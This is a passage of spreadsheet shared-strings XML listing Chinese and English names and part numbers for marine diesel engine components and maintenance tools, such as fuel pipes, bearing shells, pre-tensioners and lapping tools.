        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管出口总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管连接块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油减震器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油减震器泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口出口支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口支管蒸汽伴热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油控制泄放装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油手柄轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部支撑地板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部主轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出端推力块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出端中间体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特氟龙垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊接座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整缸套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴壳体盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴壳体装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度表安装块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部主轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位开关盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小型阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴杯形螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有爪垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器订货图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳上部机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳下部机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽灭火主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽灭火主管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>7</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支座装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主燃油进出蒸汽伴热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油枪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油枪软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转化器盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转化器指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椎形弹簧垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端中间体</t>
    </r>
  </si>
  <si>
    <t>BEARING GIRDER CENTRE PIECE DRIVING END</t>
  </si>
  <si>
    <t>BEARING GIRDER CENTRE PIECE AT DRIVING END OF CYL.1</t>
  </si>
  <si>
    <t>BEARING GIRDER CENTRE PIECE FREE END</t>
  </si>
  <si>
    <t>STUD BOLT WELDING DRAWING</t>
  </si>
  <si>
    <t>EXHAUST PIPE PACKING</t>
  </si>
  <si>
    <t>HANDRAIL STAY</t>
  </si>
  <si>
    <t>FLAME-RETARDANT GROMMET WITH MEMBRANE</t>
  </si>
  <si>
    <t>SCALE PLATE FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>HANDLE GUIDE FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>GUIDE SCREW FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>BOLT FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>LEVER FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>LINK BALL</t>
  </si>
  <si>
    <t>FORK FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>JOINT FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>JOINT FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>SHIM UNIT</t>
  </si>
  <si>
    <t>INLET MAIN PIPE OF CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>INLET BRANCH PIPE OF CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>OUTLET RIGGING CONN. PIPE OF CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t xml:space="preserve">OUTLET RIGGING CONN. PIPE OF CYLINDER COOLING </t>
  </si>
  <si>
    <t>PIPE FOR WATER VENT PIPE OF CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>PIPE FOR WATER VENT BRANCH PIPE OF CYLINDER  COOLING WATER</t>
  </si>
  <si>
    <t>AIR VENT PIPE OF OUT. MAIN PIPE OF CYL. COOLING WATER</t>
  </si>
  <si>
    <t>AIR COOLER CW                           INLET PIPE</t>
  </si>
  <si>
    <t>AIR COOLER CW                           OUTLET PIPE</t>
  </si>
  <si>
    <t>PIPE OF AIR COOLER COOLING WATER</t>
  </si>
  <si>
    <t>PIPE SUPPORT FOR AIR COOLER COOLING PIPE</t>
  </si>
  <si>
    <t>AIR COOLER AIR SIDE WASHING WATER PIPE</t>
  </si>
  <si>
    <t>PIPE ARRANGEMENT OF MAIN BEARING LUB. OIL CONN. PIPE</t>
  </si>
  <si>
    <t>PIPE SUPPORT ASSEMBLY</t>
  </si>
  <si>
    <t>INLET BRANCH PIPE OF MIDDLE OF MAIN BEARING LUBE OIL</t>
  </si>
  <si>
    <t>SUPPORT OF MAIN BEARING LUBE OIL</t>
  </si>
  <si>
    <t>INLET BRANCH PIPE OF DRIVING END OF MAIN BEARING LUBE OIL</t>
  </si>
  <si>
    <t>MAIN PIPE FOR INLET OF PISTON COOLING LUBE OIL</t>
  </si>
  <si>
    <t>BRANCH PIPE FOR INLET OF PISTON COOLING LUBE OIL</t>
  </si>
  <si>
    <t>INLET PIPE OF T/C LUB. OIL</t>
  </si>
  <si>
    <t>OUTLET PIPE  FOR T/C. NO.1 LO.</t>
  </si>
  <si>
    <t>PIPE SEEMBLY FOR LUB. PIPE OF GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>LUBRICATING OIL PIPE  FOR FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>PIPE SUPPORT FOR AXIAL VIB. DAMPER LUBE OIL</t>
  </si>
  <si>
    <t>INLET BRANCH PIPE OF STARTING AIR</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (UNION ELBOW)</t>
  </si>
  <si>
    <t>CONTROL AIR BRANCH PIPE OF STARTING AIR VALVE</t>
  </si>
  <si>
    <t>CONNECTING PIPE OF STARTING AIR CON. VALVE</t>
  </si>
  <si>
    <t>SPECIAL FLANGE FOR HIGH PRESSURE PIPE</t>
  </si>
  <si>
    <t>QUICK RELEASE VALVE  FOR STARTING AIR PIPE ARRANGEMENT</t>
  </si>
  <si>
    <t>PIPE FOE INLET CONNECTING PIPE OF EXHAUST VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>PIPE FOR INLET CONNECTING PIPE OF EXHAUST VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>BRANCH PIPE FOR INLET OF EXHAUST VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>PIPE SUPPORT FOR INLET OF EXHAUST VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>DRAIN MAIN PIPE OF PISTON ROD STUFFING BOX</t>
  </si>
  <si>
    <t>DRAIN BRANCH PIPE OF PISTON ROD STUFFING BOX</t>
  </si>
  <si>
    <t>SCREW JOINT</t>
  </si>
  <si>
    <t>Steam trace pipe of drain main pipe of fuel valve</t>
  </si>
  <si>
    <t>Steam trace pipe of drain main pipe of protective pipe</t>
  </si>
  <si>
    <t>PIPE SUPPORT OF DRAIN PIPE</t>
  </si>
  <si>
    <t>DRAIN PIPE OF PISTON UNDERSIDE</t>
  </si>
  <si>
    <t>BRACKT DRAIN PIPE OF PISTON UNDERSIDE</t>
  </si>
  <si>
    <t>DRAIN PIPE OF DRAIN SEPARATOR OF AIR COOLER</t>
  </si>
  <si>
    <t>FLOW SWITCH ASSEMBLY</t>
  </si>
  <si>
    <t>DRAIN PIPE OF FLOW SWITCH</t>
  </si>
  <si>
    <t>DRAIN PIPE OF DRAIN SEPARATOR 
OF AIR COOLER FLOW SWITCH DRAIN TANK</t>
  </si>
  <si>
    <t>DRAIN PIPE OF EXH. VALVE AIR SPRING</t>
  </si>
  <si>
    <t>10K-50 SPECIAL FLANGE</t>
  </si>
  <si>
    <t>PIPE SUPPORT 6A/15A</t>
  </si>
  <si>
    <t>PIPE SUPPORT 15A/6A×2</t>
  </si>
  <si>
    <t xml:space="preserve">RIGGING CONN. PIPE 
OF AIR VENT AND DRAIN PIPE OF AIR </t>
  </si>
  <si>
    <t>AIR VENT CONNECTING PIPE OF AIR COOLER</t>
  </si>
  <si>
    <t xml:space="preserve">BRACKET 
OF AIR COOLER AIR VENT AND DRAIN CONNECTING PIPE </t>
  </si>
  <si>
    <t>INLET DRAIN PIPE OF STARTING AIR</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTING</t>
  </si>
  <si>
    <t>LOCKING PLATE 4</t>
  </si>
  <si>
    <t>COVER FOR ELECTRIC THERMOMETER</t>
  </si>
  <si>
    <t>RUBBER PLATE A</t>
  </si>
  <si>
    <t>NAME PLATE ASSEMBLY</t>
  </si>
  <si>
    <t xml:space="preserve">PROTECTION PIPE OF EXHAUST DUCT </t>
  </si>
  <si>
    <t>PIPE OF EXHAUST DUCT PIPE</t>
  </si>
  <si>
    <t>GASKET FOR OUTLET OF EXHAUST GAS</t>
  </si>
  <si>
    <t>PREVAILING TORQUE TYPE HEXAGON NUT</t>
  </si>
  <si>
    <t>LIFTING TOOL MACHINING DRAWING</t>
  </si>
  <si>
    <t>261823107000</t>
  </si>
  <si>
    <t>PRE-TENSIONER CYLINDER COVER</t>
  </si>
  <si>
    <t>Lapping tool assembly for starting air valve seat</t>
  </si>
  <si>
    <t>FITTING AND DISMANTLING DEVICE ASSEMBLING</t>
  </si>
  <si>
    <t>ASSEMBLY TOOL FOR GLAND BOX</t>
  </si>
  <si>
    <t>CYLINDER CUT TOOL</t>
  </si>
  <si>
    <t>CUTTING OFF TOOL FOR FUEL OIL INJECTION PUMP</t>
  </si>
  <si>
    <t>CUTTING OFF TOOL FOR EXHAUST VALVE DRIVING GEAR</t>
  </si>
  <si>
    <t>PRE-TENSIONER UPPER CONNECTING ROD BEARING</t>
  </si>
  <si>
    <t>CONNECTING ROD ASSEMBLY TOOL</t>
  </si>
  <si>
    <t>PRE-TENSIONER VALVE CAGE</t>
  </si>
  <si>
    <t>TURN OVER STAND ASSEMBLY</t>
  </si>
  <si>
    <t>LAPPING TOOL FOR EXHAUST VALVE SEAT</t>
  </si>
  <si>
    <t>TEMPLATE FOR VALVE SEAT</t>
  </si>
  <si>
    <t>261813140000</t>
  </si>
  <si>
    <t>TEMPLATE FOR VALVE SPINDLE</t>
  </si>
  <si>
    <t>261823103000</t>
  </si>
  <si>
    <t>LAPPING TOOL</t>
  </si>
  <si>
    <t>TAKE OFF TOOL FOR START AIR VALVE</t>
  </si>
  <si>
    <t>TEST DEVICE FOR CYLINDER SAFTY VALVE</t>
  </si>
  <si>
    <t>LAPPING TOOL ASSEMBLY (BRACKET SIDE)FOR SEALING SURFACES ON FUEL INJECTION PIPES</t>
  </si>
  <si>
    <t>LAPPING TOOL ASSEMBLY (FUEL INJECTION PUMP SIDE)FOR SEALING SURFACES ON FUEL INJECTION PIPES</t>
  </si>
  <si>
    <t>RUBBER HOSE</t>
  </si>
  <si>
    <t>PARTS BOX ASSEMBLY</t>
  </si>
  <si>
    <t>HOLLOW SCREW</t>
  </si>
  <si>
    <t>CONICAL WASHER</t>
  </si>
  <si>
    <t>DAAD053496</t>
  </si>
  <si>
    <t>PIPING RAIL UNIT</t>
  </si>
  <si>
    <t>DAAD081602</t>
  </si>
  <si>
    <t>SOLENOID HEAD</t>
  </si>
  <si>
    <t>DAAD041237</t>
  </si>
  <si>
    <t>2/2-WAY VALVE</t>
  </si>
  <si>
    <t>DAAD062676</t>
  </si>
  <si>
    <t>OIL PIPE CROSSHEAD</t>
  </si>
  <si>
    <t>DAAD077940</t>
  </si>
  <si>
    <t>DISC RETURN VALVE</t>
  </si>
  <si>
    <t>107.283.248</t>
  </si>
  <si>
    <t>法兰</t>
  </si>
  <si>
    <t>泄放管</t>
  </si>
  <si>
    <t>型板</t>
  </si>
  <si>
    <t>支架</t>
  </si>
  <si>
    <t>变径接头</t>
  </si>
  <si>
    <t xml:space="preserve">PIPE </t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">PIPE  </t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>LOWER PART</t>
  </si>
  <si>
    <t>TUBE STUB</t>
  </si>
  <si>
    <t>STIFFENING SLEEVE</t>
  </si>
  <si>
    <t>SPHERICAL DISC</t>
  </si>
  <si>
    <t>BALL CUP</t>
  </si>
  <si>
    <t>SWIVELLING UNION</t>
  </si>
  <si>
    <t>DAAD056629</t>
  </si>
  <si>
    <t>GRINDING DISC</t>
  </si>
  <si>
    <t>107.424.190</t>
  </si>
  <si>
    <t>CONE PIECE</t>
  </si>
  <si>
    <t>SET OF TOOLS</t>
  </si>
  <si>
    <t>PACKING CRATE</t>
  </si>
  <si>
    <t>CLAMPING LEVER</t>
  </si>
  <si>
    <t>DAAD009736</t>
  </si>
  <si>
    <t>HEXAGON HEAD SCREW WITH DOG POINT</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SPIRAL GASKET</t>
  </si>
  <si>
    <t>107.433.391</t>
  </si>
  <si>
    <t>MOUNTING OF TUNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Painting Procedure and Rust Preventing for UEC Type Engines</t>
  </si>
  <si>
    <t>PUNCH BAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT LINER  FOR CROSS HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE TONGUED WASHERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OFFSET PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON HEAD BOLTS WITH WIRE HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSPECTION HOLE COVER FOR CAMSHAFT DRIVING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING METAL FOR CAMSHAFT</t>
